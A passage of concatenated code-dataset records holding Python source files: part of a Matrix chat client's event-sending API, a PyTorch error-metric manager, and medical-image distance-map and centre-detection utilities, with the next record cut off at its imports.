If set to None, the given HTML is used instead.\n html: The HTML to send.\n msgtype: The message type to send.\n Defaults to :attr:`MessageType.TEXT` (normal text message)\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_text(room_id, text, html, MessageType.NOTICE, relates_to, **kwargs)\n\n def send_emote(self, room_id: RoomID, text: str, html: Optional[str] = None,\n relates_to: Optional[RelatesTo] = None, **kwargs) -> Awaitable[EventID]:\n \"\"\"\n Send an emote to a room. Emotes are usually displayed by prepending a star and the user's\n display name to the message, which means they're usually written in the third person.\n\n Args:\n room_id: The ID of the room to send the message to.\n text: The text to send. If set to None, the given HTML is used instead.\n html: The HTML to send.\n msgtype: The message type to send.\n Defaults to :attr:`MessageType.TEXT` (normal text message)\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_text(room_id, text, html, MessageType.EMOTE, relates_to, **kwargs)\n\n def send_file(self, room_id: RoomID, url: ContentURI, info: Optional[BaseFileInfo] = None,\n file_name: str = None, file_type: MessageType = MessageType.FILE,\n relates_to: Optional[RelatesTo] = None, **kwargs) -> Awaitable[EventID]:\n \"\"\"\n Send a file to a room.\n\n Args:\n room_id: The ID of the room to send the message to.\n url: The Matrix content repository URI of the file. You can upload files using\n :meth:`~MediaRepositoryMethods.upload_media`.\n info: Additional metadata about the file, e.g. mimetype, image size, video duration, etc\n file_name: The name for the file to send.\n file_type: The general file type to send. The file type can be further specified by\n setting the ``mimetype`` field of the ``info`` parameter. Defaults to\n :attr:`MessageType.FILE` (unspecified file type, e.g. document)\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_message(room_id,\n MediaMessageEventContent(url=url, info=info, body=file_name,\n relates_to=relates_to,\n msgtype=file_type), **kwargs)\n\n def send_sticker(self, room_id: RoomID, url: ContentURI, info: Optional[ImageInfo],\n text: Optional[str] = \"\", relates_to: Optional[RelatesTo] = None, **kwargs\n ) -> Awaitable[EventID]:\n \"\"\"\n Send a sticker to a room. Stickers are basically images, but they're usually rendered\n slightly differently.\n\n Args:\n room_id: The ID of the room to send the message to.\n url: The Matrix content repository URI of the sticker. You can upload files using\n :meth:`~MediaRepositoryMethods.upload_media`.\n info: Additional metadata about the sticker, e.g. 
mimetype and image size\n text: A textual description of the sticker.\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_message_event(room_id, EventType.STICKER,\n MediaMessageEventContent(url=url, info=info, body=text,\n relates_to=relates_to),\n **kwargs)\n\n def send_image(self, room_id: RoomID, url: ContentURI, info: Optional[ImageInfo] = None,\n file_name: str = None, relates_to: Optional[RelatesTo] = None, **kwargs\n ) -> Awaitable[EventID]:\n \"\"\"\n Send an image to a room.\n\n Args:\n room_id: The ID of the room to send the message to.\n url: The Matrix content repository URI of the image. You can upload files using\n :meth:`~MediaRepositoryMethods.upload_media`.\n info: Additional metadata about the image, e.g. mimetype and image size\n file_name: The file name for the image to send.\n relates_to: Message relation metadata used for things like replies.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method.\n\n Returns:\n The ID of the event that was sent.\n \"\"\"\n return self.send_file(room_id, url, info, file_name, MessageType.IMAGE, relates_to,\n **kwargs)\n\n # endregion\n\n # endregion\n # region 8.5 Redactions\n # API reference: https://matrix.org/docs/spec/client_server/r0.4.0.html#redactions\n\n async def redact(self, room_id: RoomID, event_id: EventID, reason: Optional[str] = \"\", **kwargs\n ) -> EventID:\n \"\"\"\n Send an event to redact a previous event.\n\n Redacting an event strips all information out of an event which isn't critical to the\n integrity of the server-side representation of the room.\n\n This cannot be undone.\n\n Users may redact their own events, and any user with a power level greater than or equal to\n the redact power level of the room may redact events there.\n\n See also: `/redact API reference`_\n\n Args:\n room_id: The ID of the room the event is in.\n event_id: The ID of the event to redact.\n reason: The reason for the event being redacted.\n **kwargs: Optional parameters to pass to the :meth:`HTTPAPI.request` method. Used by\n :class:`IntentAPI` to pass the timestamp massaging field to\n :meth:`AppServiceAPI.request`.\n\n Returns:\n The ID of the event that was sent to redact the other event.\n\n .. _/redact API reference:\n https://matrix.org/docs/spec/client_server/r0.5.0#put-matrix-client-r0-rooms-roomid-redact-eventid-txnid\n \"\"\"\n url = Path.rooms[room_id].redact[event_id][self.api.get_txn_id()]\n resp = await self.api.request(Method.PUT, url, content={\"reason\": reason}, **kwargs)\n try:\n return resp[\"event_id\"]\n except KeyError:\n raise MatrixResponseError(\"`event_id` not in response.\")\n\n # endregion\n","repo_name":"Ma27/mautrix-python","sub_path":"mautrix/client/api/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":23791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"31143276917","text":"\"\"\"Metrics to measure progress, and infrastructure for logging them.\"\"\"\n\nimport functools\nimport torch\nfrom . distributed import get_cuda_device\nfrom . 
tracker import AverageTrackerDevice\nfrom ..data.mask import load_region_mask\n\n\ndef dim_tuple(tensor):\n \"\"\"Return a tuple containing the indices of each dimension of tensor.\n\n For an n-dimensional tensor, this is (0, 1, ..., n - 1).\n\n \"\"\"\n return tuple(range(tensor.ndim))\n\n\n@torch.no_grad()\ndef mse_metric(x, y, mask=None, mask_nnz=None):\n \"\"\"Compute the mean square error between x and y.\n\n If mask is not None, each mask region is computed separately.\n\n mask_nnz is the number of non-zeros in each mask channel. This\n should be precomputed to avoid overhead.\n\n \"\"\"\n if mask is None:\n return ((x - y)**2).mean()\n if x.size(1) != 1:\n raise RuntimeError('Mask not supported for multiple channels')\n z = ((x - y)**2) * mask\n return z.sum(dim=(0,) + dim_tuple(x)[2:]) / (mask_nnz * x.size(0))\n\n\n@torch.no_grad()\ndef mae_metric(x, y, mask=None, mask_nnz=None):\n \"\"\"Compute the mean absolute error between x and y.\n\n If mask is not None, each mask region is computed separately.\n\n mask_nnz is the number of non-zeros in each mask channel. This\n should be precomputed to avoid overhead.\n\n \"\"\"\n if mask is None:\n return (x - y).abs().mean()\n if x.size(1) != 1:\n raise RuntimeError('Mask not supported for multiple channels')\n z = (x - y) * mask\n z = z.abs()\n return z.sum(dim=(0,) + dim_tuple(x)[2:]) / (mask_nnz * x.size(0))\n\n\n@torch.no_grad()\ndef rmse_metric(x, y, mask=None, mask_nnz=None):\n \"\"\"Compute the root mean squared error between x and y.\n\n If mask is not None, each mask region is computed separately.\n\n mask_nnz is the number of non-zeros in each mask channel. This\n should be precomputed to avoid overhead.\n\n \"\"\"\n # Note: We want to return the mean of the RMSE over the samples,\n # which means we need to take that mean after the square root.\n if mask is None:\n return ((x - y)**2).mean(dim=dim_tuple(x)[1:]).sqrt().mean()\n if x.size(1) != 1:\n raise RuntimeError('Mask not supported for multiple channels')\n z = ((x - y)**2) * mask\n z = z.sum(dim=(dim_tuple(x)[2:])) / mask_nnz\n z.sqrt_()\n return z.mean(dim=0)\n\n\n@torch.no_grad()\ndef nrmse_metric(x, y, mask=None, mask_nnz=None):\n \"\"\"Compute the normalized root mean squared error between x and y.\n\n If mask is not None, each mask region is computed separately.\n\n mask_nnz is the number of non-zeros in each mask channel. This\n should be precomputed to avoid overhead.\n\n This will normalize using the range of each sample in y.\n\n \"\"\"\n if mask is None:\n dim = dim_tuple(x)[1:]\n rmse = ((x - y)**2).mean(dim=dim).sqrt()\n nrmse = rmse / (y.amax(dim=dim) - y.amin(dim=dim))\n return nrmse.mean()\n if x.size(1) != 1:\n raise RuntimeError('Mask not supported for multiple channels')\n dim = dim_tuple(x)[2:]\n z = ((x - y)**2) * mask\n rmse = (z.sum(dim=dim) / mask_nnz).sqrt()\n nrmse = rmse / (y.amax(dim=dim) - y.amin(dim=dim))\n return nrmse.mean(dim=0)\n\n\n@torch.no_grad()\ndef prcntclose_metric(x, y, mask=None, mask_nnz=None, atol=1e-8, rtol=0.01,\n mask_tol=None):\n \"\"\"Compute the percent of values that are 'close'.\n\n This essentially is an element-wise allclose.\n\n If mask is not None, each mask region is computed separately.\n\n mask_nnz is the number of non-zeros in each mask channel. 
This\n should be precomputed to avoid overhead.\n\n If mask_tol is not None, it will be used to scale rtol at each\n point.\n\n \"\"\"\n if mask_tol is not None:\n close = (x - y).abs() <= atol + rtol*mask_tol*y.abs()\n else:\n close = (x - y).abs() <= atol + rtol*y.abs()\n if mask is None:\n return close.sum() / close.numel() * 100\n if x.size(1) != 1:\n raise RuntimeError('Mask not supported for multiple channels')\n close = close * mask\n return close.sum(dim=(0,) + dim_tuple(close)[2:]) / (mask_nnz * x.size(0)) * 100\n\n\n@torch.no_grad()\ndef topk_accuracy_metric(x: torch.Tensor, y: torch.Tensor, k: int) -> torch.Tensor:\n \"\"\"Compute the top-k accuracy of x using y.\"\"\"\n _, pred = x.topk(k, 1, True, True)\n pred = pred.t()\n correct = pred.eq(y.view(1, -1).expand_as(pred))\n correct_k = correct[:k].float().sum()\n correct_k.mul_(100.0 / x.size(0))\n return correct_k\n\n\nclass MetricManager:\n \"\"\"Manages applying and tracking metrics.\"\"\"\n\n def __init__(self, metric_names, criterion, n, prcntclose=None,\n prcntclose_tol_scale=None, allreduce=True, mask=None):\n \"\"\"Initialize the metric manager with a list of metrics and mask.\"\"\"\n metrics_map = {\n 'mse': mse_metric,\n 'mae': mae_metric,\n 'rmse': rmse_metric,\n 'nrmse': nrmse_metric,\n 'top1': functools.partial(topk_accuracy_metric, k=1),\n 'top5': functools.partial(topk_accuracy_metric, k=5)\n }\n if prcntclose_tol_scale and not mask:\n raise ValueError('Must give a mask to use --prcntclose-tol-scale')\n if mask:\n self.mask = load_region_mask(mask).to(get_cuda_device())\n self.mask_nnz = self.mask.sum(dim=dim_tuple(self.mask)[1:])\n else:\n self.mask = None\n self.mask_nnz = None\n if prcntclose_tol_scale:\n # Load mask again, unexpanded.\n mask_unexp = load_region_mask(mask, expand=False)\n num_regions = torch.unique(mask_unexp).numel()\n # Pad scaling if there's not enough elements.\n if len(prcntclose_tol_scale) != num_regions:\n prcntclose_tol_scale += [1.0] * (num_regions - len(prcntclose_tol_scale))\n self.mask_tol = torch.zeros(mask_unexp.size())\n for i in range(num_regions):\n indices = mask_unexp == i\n self.mask_tol[indices] = prcntclose_tol_scale[i]\n self.mask_tol = self.mask_tol.to(get_cuda_device())\n else:\n self.mask_tol = None\n mask_metrics_map = {\n 'mask-mse': functools.partial(mse_metric, mask=self.mask,\n mask_nnz=self.mask_nnz),\n 'mask-mae': functools.partial(mae_metric, mask=self.mask,\n mask_nnz=self.mask_nnz),\n 'mask-rmse': functools.partial(rmse_metric, mask=self.mask,\n mask_nnz=self.mask_nnz),\n 'mask-nrmse': functools.partial(nrmse_metric, mask=self.mask,\n mask_nnz=self.mask_nnz),\n }\n if prcntclose is None:\n prcntclose = []\n for prcnt in prcntclose:\n metrics_map[f'prcntclose{prcnt*100}'] = functools.partial(\n prcntclose_metric, rtol=prcnt)\n mask_metrics_map[f'mask-prcntclose{prcnt*100}'] = functools.partial(\n prcntclose_metric, mask=self.mask, mask_nnz=self.mask_nnz,\n rtol=prcnt)\n if self.mask_tol is not None:\n metrics_map[f'prcntclose{prcnt*100}s'] = functools.partial(\n prcntclose_metric, rtol=prcnt, mask_tol=self.mask_tol)\n mask_metrics_map[f'mask-prcntclose{prcnt*100}s'] = functools.partial(\n prcntclose_metric, mask=self.mask, mask_nnz=self.mask_nnz,\n rtol=prcnt, mask_tol=self.mask_tol)\n if 'all' in metric_names:\n metric_names = list(metrics_map.keys())\n if self.mask is not None:\n metric_names += list(mask_metrics_map.keys())\n # Add the right prcntclose entries.\n if 'prcntclose' in metric_names and prcntclose:\n metric_names.remove('prcntclose')\n 
metric_names += [f'prcntclose{prcnt*100}' for prcnt in prcntclose]\n if self.mask_tol is not None:\n metric_names += [f'prcntclose{prcnt*100}s' for prcnt in prcntclose]\n if 'mask-prcntclose' in metric_names and prcntclose:\n metric_names.remove('mask-prcntclose')\n metric_names += [f'mask-prcntclose{prcnt*100}' for prcnt in prcntclose]\n if self.mask_tol is not None:\n metric_names += [f'mask-prcntclose{prcnt*100}s' for prcnt in prcntclose]\n self.metrics = {}\n self.metric_trackers = {}\n for metric in metric_names:\n if metric in metrics_map:\n self.metrics[metric] = metrics_map[metric]\n self.metric_trackers[metric] = AverageTrackerDevice(\n n, get_cuda_device(), allreduce=allreduce)\n elif metric in mask_metrics_map:\n if self.mask is None:\n raise ValueError('Must provide mask for masked metrics')\n self.metrics[metric] = mask_metrics_map[metric]\n self.metric_trackers[metric] = AverageTrackerDevice(\n n, get_cuda_device(), allreduce=allreduce,\n shape=(self.mask.size(0),))\n else:\n raise ValueError('Unknown metric ' + metric)\n self.metrics['loss'] = criterion\n self.metric_trackers['loss'] = AverageTrackerDevice(\n n, get_cuda_device(), allreduce=allreduce)\n self.metric_vals = {}\n self.reset()\n\n def reset(self):\n \"\"\"Clear tracking information for metrics.\"\"\"\n self.metric_vals = {}\n for tracker in self.metric_trackers.values():\n tracker.reset()\n\n def compute_metrics(self, output, targets):\n \"\"\"Compute and save all metrics.\"\"\"\n self.metric_vals = {\n metric: self.metrics[metric](output, targets)\n for metric in self.metrics\n }\n\n def update_trackers(self, count=1.0):\n \"\"\"Update metric trackers.\"\"\"\n for metric, val in self.metric_vals.items():\n self.metric_trackers[metric].update(val, count)\n\n def get_metric_means(self):\n \"\"\"Return a dict with the mean values of each metric.\"\"\"\n return {\n metric: self.metric_trackers[metric].mean()\n for metric in self.metrics\n }\n\n def log_metrics(self, log, indent=0, prefix='', metrics=None):\n \"\"\"Log the mean values of each metric.\n\n If provided, uses metrics for the values rather than computing\n them.\n\n \"\"\"\n start = ' ' * indent + prefix\n metric_vals = metrics\n if not metric_vals:\n metric_vals = {\n metric: tracker.mean()\n for metric, tracker in self.metric_trackers.items()\n }\n for metric, mean in metric_vals.items():\n if isinstance(mean, list):\n mean_fmt = ', '.join(f'{m:.5f}' for m in mean)\n log.log(start + ' ' + metric + ': ' + mean_fmt)\n else:\n log.log(start + f' {metric}: {mean:.5f}')\n","repo_name":"spcl/smoe","sub_path":"smoe/utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":11010,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"21433807843","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom PolarVW.UTL import croppatch,fillpatch\nfrom scipy.ndimage import gaussian_filter\nimport copy\nimport cv2\n\n\ndef min_dist(ptx, pty, mask, direction):\n deltax = np.cos(direction / 180 * np.pi)\n deltay = np.sin(direction / 180 * np.pi)\n dist = 0\n cval = mask[pty, ptx]\n while cval > 0:\n ptx += deltax\n pty += deltay\n dist += 1\n cval = mask[int(round(pty)), int(round(ptx))]\n\n return dist\n\n\ndef min_dist_pt(ptx, pty, mask):\n cdist = np.inf\n for di in range(0, 360, 45):\n cdist = min(cdist, min_dist(ptx, pty, mask, di))\n return cdist\n\n\ndef get_min_dist_map(mask):\n min_dist_map = []\n deltax = [1, 1, 0, -1, -1, -1, 0, 1]\n deltay = [0, 1, 1, 1, 0, -1, -1, -1]\n 
for i in range(len(deltax)):\n # print('dir',deltax[i],deltay[i])\n min_dist_map.append(get_min_dist_dir_map(mask, deltax[i], deltay[i]))\n return np.moveaxis(np.array(min_dist_map), 0, 2)\n\n\ndef get_min_dist_dir_map(mask, deltax, deltay):\n min_dist_map = np.zeros(mask.shape)\n maskregion = np.where(mask > 0)\n min_dist_map[maskregion] = -1\n # deltax = int(np.ceil(np.cos(direction / 180 * np.pi)))\n # deltay = int(np.ceil(np.sin(direction / 180 * np.pi)))\n delta = np.sqrt(deltax * deltax + deltay * deltay)\n for pi in range(maskregion[0].shape[0]):\n cpty = maskregion[0][pi]\n cptx = maskregion[1][pi]\n if min_dist_map[cpty][cptx] == -1:\n # print('pt',cpty,cptx)\n # extract one line\n step = 0\n extx = cptx\n exty = cpty\n steps = []\n ptxy = []\n while step < mask.shape[0] * 1.42 and min_dist_map[exty][extx] == -1:\n ptxy.append([extx, exty])\n steps.append(step)\n step += 1\n extx = cptx + deltax * step\n exty = cpty + deltay * step\n\n largeststep = min_dist_map[exty][extx] + step * delta\n # print(extx,exty,min_dist_map[exty][extx],largeststep)\n # paint min_dist_map along the line\n for cstepi in range(len(steps)):\n cstep = steps[cstepi]\n cdist = largeststep - cstep * delta\n extx = ptxy[cstepi][0]\n exty = ptxy[cstepi][1]\n min_dist_map[exty][extx] = cdist\n # print('pt', extx, exty, cdist)\n\n return min_dist_map\n\n\ndef find_nms_center(dist_map, fig=0):\n rad = 3\n nms_dist_map = copy.copy(dist_map)\n nms_dist_map = gaussian_filter(nms_dist_map, sigma=3)\n if fig:\n nms_dist_map_p = np.zeros((nms_dist_map.shape[0], nms_dist_map.shape[1], 3), dtype=np.uint8)\n nms_dist_map_p[:, :, 0] = dist_map / np.max(dist_map) * 255\n\n thres = np.max(nms_dist_map) * 0.5\n nz = np.where(dist_map > thres)\n min_ct_dist_thres = 40\n nms_centers = {}\n for pi in range(nz[0].shape[0]):\n pty = nz[0][pi]\n ptx = nz[1][pi]\n if pty < rad or ptx < rad:\n continue\n mn = np.max(nms_dist_map[pty - rad:pty + rad + 1, ptx - rad:ptx + rad + 1])\n if nms_dist_map[pty, ptx] == mn:\n has_nei_ct_higher = False\n for cti in list(nms_centers.keys()):\n eptx = int(cti.split('-')[0])\n epty = int(cti.split('-')[1])\n ethres = nms_centers[cti]\n if pow(eptx - ptx, 2) + pow(epty - pty, 2) < pow(min_ct_dist_thres, 2):\n if ethres > mn:\n #print(ptx, pty, mn, 'smaller than', cti, ethres)\n has_nei_ct_higher = True\n else:\n nms_centers['%d-%d' % (ptx, pty)] = mn\n del nms_centers[cti]\n #else:\n # print(np.sqrt(pow(eptx - ptx, 2) + pow(eptx - ptx, 2)), 'over', min_ct_dist_thres)\n if has_nei_ct_higher == False:\n nms_centers['%d-%d' % (ptx, pty)] = mn\n\n # if fig:\n # plt.imshow(nms_dist_map_p / np.max(nms_dist_map_p))\n # plt.show()\n if fig:\n for cti in nms_centers.keys():\n ptx = int(cti.split('-')[0])\n pty = int(cti.split('-')[1])\n nms_dist_map_p[pty - 5:pty + 6, ptx - 1:ptx + 2, 1] = 255\n nms_dist_map_p[pty - 1:pty + 2, ptx - 5:ptx + 6, 1] = 255\n if fig:\n return nms_centers, nms_dist_map_p\n else:\n return nms_centers\n\ndef find_con_region(dist_map, fig=0):\n DEBUG = 0\n nms_dist_map = copy.copy(dist_map)\n nms_dist_map = gaussian_filter(nms_dist_map, sigma=3)\n if fig:\n nms_dist_map_p = np.zeros((nms_dist_map.shape[0], nms_dist_map.shape[1], 3), dtype=np.uint8)\n nms_dist_map_p[:, :, 0] = dist_map / np.max(dist_map) * 255\n\n # connected region\n nms_dist_map_int = (nms_dist_map / np.max(nms_dist_map) * 255).astype(np.uint8)\n ret, thresh = cv2.threshold(nms_dist_map_int, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n connectivity = 4\n output = cv2.connectedComponentsWithStats(thresh, 
connectivity, cv2.CV_32S)\n # The first cell is the number of labels\n num_labels = output[0]\n # The second cell is the label matrix\n complabel = output[1]\n # The third cell is the stat matrix\n stats = output[2]\n if DEBUG:\n plt.imshow(complabel)\n plt.colorbar()\n plt.show()\n # map from label id to bb around component\n component_bbs = []\n for pti in range(num_labels):\n if pti == complabel[0, 0]:\n continue\n component_pixels = stats[pti, -1]\n if component_pixels < 100:\n #print('connected region', component_pixels,'ignore')\n continue\n cbb = find_component_bb(complabel, pti, nms_dist_map)\n component_bbs.append(cbb)\n if fig:\n for cti in component_bbs:\n ptx = int(round(cti.x))\n pty = int(round(cti.y))\n nms_dist_map_p[pty - 5:pty + 6, ptx - 1:ptx + 2, 1] = 255\n nms_dist_map_p[pty - 1:pty + 2, ptx - 5:ptx + 6, 1] = 255\n if fig:\n nms_dist_map_p[:,:,2] = complabel\n return component_bbs, nms_dist_map_p\n else:\n return component_bbs\n\n# find center\ndef gen_2d_gaussion(size, sigma=1, mu=0):\n x, y = np.meshgrid(np.linspace(-1, 1, size), np.linspace(-1, 1, size))\n d = np.sqrt(x * x + y * y)\n g = np.exp(-((d - mu) ** 2 / (2.0 * sigma ** 2)))\n return g\n\n\n# predict multiple min dist map and average\ndef multi_min_dist_map(min_dist_cnn, dicomslice, octy, octx, patchheight, patchwidth):\n search_patch_rz_batch = []\n stride = 10\n rg = 2\n DEBUG = 0\n for ofi in np.arange(-rg, rg + 1):\n for ofj in np.arange(-rg, rg + 1):\n octyof = octy + ofi * stride\n octxof = octx + ofj * stride\n searchpatch = croppatch(dicomslice, octyof, octxof, patchheight, patchwidth)\n searchpatchrz = cv2.resize(searchpatch, (0, 0), fx=4, fy=4)\n searchpatchrz = searchpatchrz/np.max(searchpatchrz)\n # searchpatchrz = searchpatch\n search_patch_rz_batch.append(searchpatchrz)\n '''plt.imshow(searchpatchrz)\n plt.title('Original Patch'+str(octyof)+str(octxof))\n plt.show()'''\n\n search_patch_rz_batch = np.array(search_patch_rz_batch)\n min_dist_search_patch_batch = min_dist_cnn.predict(search_patch_rz_batch[:, :, :, None])[:, :, :, 0]\n min_dist_search_patch = []\n for i in range(min_dist_search_patch_batch.shape[0]):\n ofi = i // (2 * rg + 1) - rg\n ofj = i % (2 * rg + 1) - rg\n # print(ofi,ofj)\n offpred = croppatch(min_dist_search_patch_batch[i], 256 - ofi * stride * 4, 256 - ofj * stride * 4, 256,\n 256)\n # offpred = croppatch(min_dist_search_patch_batch[i], 256 - ofi * stride, 256 - ofj * stride, 256, 256)\n if DEBUG:\n plt.suptitle('Original Patch'+str(ofi)+str(ofj))\n plt.subplot(1,3,1)\n plt.imshow(search_patch_rz_batch[i])\n plt.subplot(1,3,2)\n plt.imshow(min_dist_search_patch_batch[i])\n plt.subplot(1,3,3)\n plt.imshow(offpred)\n #plt.colorbar()\n plt.show()\n print(np.max(offpred))\n min_dist_search_patch.append(offpred / np.max(offpred))\n min_dist_search_patch = np.array(min_dist_search_patch)\n min_dist_search_patch = np.max(min_dist_search_patch, axis=0)\n # plt.imshow(min_dist_search_patch)\n return min_dist_search_patch\n\ndef multi_min_dist_pred(min_dist_cnn, dicomslice, octy, octx, patchheight, patchwidth, kernelmask=None):\n min_dist_search_patch = multi_min_dist_map(min_dist_cnn, dicomslice, octy, octx, patchheight, patchwidth)\n if kernelmask is None:\n kernelmask = gen_2d_gaussion(min_dist_search_patch.shape[0], 0.5)\n dist_pred_ct, nms_dist_map_p = find_nms_center(min_dist_search_patch * kernelmask, fig=1)\n search_patch_center = croppatch(dicomslice, octy, octx, patchheight, patchwidth)\n search_patch_center_rz = cv2.resize(search_patch_center, (0, 0), fx=4, fy=4)\n # 
search_patch_center_rz = search_patch_center\n #print('map max',np.max(search_patch_center_rz))\n nms_dist_map_p[:, :, 2] = search_patch_center_rz * 255\n\n cts = [[int(i.split('-')[0]), int(i.split('-')[1])] for i in list(dist_pred_ct.keys())]\n\n if len(cts) == 0:\n print('no ct')\n elif len(cts) != 1:\n pass\n #print('cts', len(cts))\n return cts, nms_dist_map_p\n\ndef multi_min_dist_pred_withinbb(min_dist_cnn, dicomslice, bb, patchheight, patchwidth):\n SCALE = 4\n octy = bb.y\n octx = bb.x\n ENL = 1.2\n min_dist_search_patch = multi_min_dist_map(min_dist_cnn, dicomslice, octy, octx, patchheight, patchwidth)\n min_dist_search_patch_rz = croppatch(min_dist_search_patch,min_dist_search_patch.shape[1]/2,min_dist_search_patch.shape[0]/2,bb.h/2*SCALE*ENL,bb.w/2*SCALE*ENL)\n min_dist_search_patch_rz = fillpatch(np.zeros(min_dist_search_patch.shape),min_dist_search_patch_rz)\n #plt.imshow(min_dist_search_patch_rz)\n #plt.show()\n\n #all cts\n dist_pred_ct, nms_dist_map_p = find_nms_center(min_dist_search_patch_rz, fig=1)\n #cts = [[int(i.split('-')[0]), int(i.split('-')[1])] for i in list(dist_pred_ct.keys())]\n\n nms_dist_map = nms_dist_map_p[:,:,0]\n #remove cts in unconnected region\n nms_dist_map_int = (nms_dist_map / np.max(nms_dist_map) * 255).astype(np.uint8)\n ret, thresh = cv2.threshold(nms_dist_map_int, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n connectivity = 4\n output = cv2.connectedComponentsWithStats(thresh, connectivity, cv2.CV_32S)\n # The second cell is the label matrix\n component_label = output[1]\n #plt.imshow(component_label)\n #plt.show()\n\n center_component_label = component_label[256,256]\n cts = []\n for i in dist_pred_ct:\n if component_label[int(i.split('-')[1]), int(i.split('-')[0])] != center_component_label:\n #print('ignore unconnected nms ct')\n continue\n cts.append([int(i.split('-')[0]), int(i.split('-')[1])])\n\n search_patch_center = croppatch(dicomslice, octy, octx, patchheight, patchwidth)\n search_patch_center_rz = cv2.resize(search_patch_center, (0, 0), fx=4, fy=4)\n # search_patch_center_rz = search_patch_center\n nms_dist_map_p[:, :, 2] = search_patch_center_rz / np.max(search_patch_center_rz) * 255\n\n if len(cts) == 0:\n #print('no ct')\n pass\n elif len(cts) != 1:\n pass\n '''print('cts', len(cts))\n plt.subplot(1,2,1)\n plt.title('component_label')\n plt.imshow(component_label)\n plt.subplot(1, 2, 2)\n plt.title('nms_dist_map_p')\n plt.imshow(nms_dist_map_p)\n plt.show()'''\n return cts, nms_dist_map_p\n\ndef find_component_bb(complabel, labelid, nms_dist_map):\n ypos, xpos = np.where(complabel == labelid)\n xmin = np.min(xpos)\n xmax = np.max(xpos)\n ymin = np.min(ypos)\n ymax = np.max(ypos)\n mapval = []\n for i in range(len(ypos)):\n mapval.append(nms_dist_map[ypos[i],xpos[i]])\n c = np.mean(mapval)\n #min_dist_prob_region = nms_dist_map_p[ymin:ymax,xmin:xmax]\n return BB.fromminmax(xmin, xmax, ymin, ymax, c, [c])\n\ndef multi_min_dist_pred_component(min_dist_cnn, dicomslice, bb, patchheight, patchwidth, kernelmask=None):\n #min_dist_search_patch = multi_min_dist_map(min_dist_cnn, dicomslice, octy, octx, patchheight, patchwidth)\n cts, nms_dist_map_p = multi_min_dist_pred_withinbb(min_dist_cnn, dicomslice,bb, 64, 64)\n min_dist_search_patch = nms_dist_map_p[:, :, 0]\n if kernelmask is None:\n kernelmask = gen_2d_gaussion(min_dist_search_patch.shape[0], 0.5)\n component_bbs, nms_dist_map_p = find_con_region(min_dist_search_patch * kernelmask, fig=1)\n #prepare output img\n search_patch_center = croppatch(dicomslice, bb.y, bb.x, 
patchheight, patchwidth)\n search_patch_center_rz = cv2.resize(search_patch_center, (0, 0), fx=4, fy=4)\n # search_patch_center_rz = search_patch_center\n # print('map max',np.max(search_patch_center_rz))\n nms_dist_map_p[:, :, 2] = search_patch_center_rz * 255\n return component_bbs, nms_dist_map_p\n\ndef multi_min_dist_pred_component_all(min_dist_cnn, dicomslice, bb, patchheight, patchwidth, kernelmask=None):\n cts, nms_dist_map_p = multi_min_dist_pred(min_dist_cnn, dicomslice, bb.y, bb.x, 64, 64)\n min_dist_search_patch = nms_dist_map_p[:, :, 0]\n if kernelmask is None:\n kernelmask = gen_2d_gaussion(min_dist_search_patch.shape[0], 0.5)\n component_bbs, nms_dist_map_p = find_con_region(min_dist_search_patch * kernelmask, fig=1)\n # prepare output img\n search_patch_center = croppatch(dicomslice, bb.y, bb.x, patchheight, patchwidth)\n search_patch_center_rz = cv2.resize(search_patch_center, (0, 0), fx=4, fy=4)\n # search_patch_center_rz = search_patch_center\n # print('map max',np.max(search_patch_center_rz))\n #nms_dist_map_p[:, :, 2] = search_patch_center_rz * 255\n return component_bbs, nms_dist_map_p\n\n# find label id from thresholded min dist map for nms centers, and bb around each connected component\ndef labelcts(nms_dist_map_p, nms_centers):\n ret, thresh = cv2.threshold(nms_dist_map_p, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n connectivity = 4\n output = cv2.connectedComponentsWithStats(thresh, connectivity, cv2.CV_32S)\n complabel = output[1]\n # plt.imshow(complabel)\n # component label id for each nms centers\n component_label_ids = []\n # map from label id to bb around component\n component_bbs = {}\n for pti in nms_centers:\n component_label_ids.append(complabel[pti[1], pti[0]])\n if complabel[pti[1], pti[0]] not in component_bbs:\n component_bbs[complabel[pti[1], pti[0]]] = find_component_bb(complabel, complabel[pti[1], pti[0]],nms_dist_map_p)\n return component_label_ids, component_bbs\n\n\nfrom PolarVW.BB import BB\ndef mergects(nms_dist_map_p, nms_centers):\n # threshold and connected component, if cts in the same region, merge\n component_label_ids, component_bbs = labelcts(nms_dist_map_p, nms_centers)\n label_id_cts = {} # map from label id to array of contours\n for cti in range(len(nms_centers)):\n if component_label_ids[cti] not in label_id_cts:\n label_id_cts[component_label_ids[cti]] = []\n label_id_cts[component_label_ids[cti]].append(nms_centers[cti])\n mcts = []\n for labeli in label_id_cts:\n mct = np.mean(np.array(label_id_cts[labeli]), axis=0).tolist()\n #mbb = component_bbs[labeli]\n #print('mbb offset', mbb.x - mct[0], mbb.y - mct[1])\n mcts.append(mct)\n return mcts\n\n\n","repo_name":"clatfd/PolarReg","sub_path":"PolarVW/mindist.py","file_name":"mindist.py","file_ext":"py","file_size_in_byte":15661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14223505096","text":"try:\n import configparser\nexcept ImportError:\n import ConfigParser as configparser\nimport datetime\nimport os, re\n\nimport azure.storage.blob as 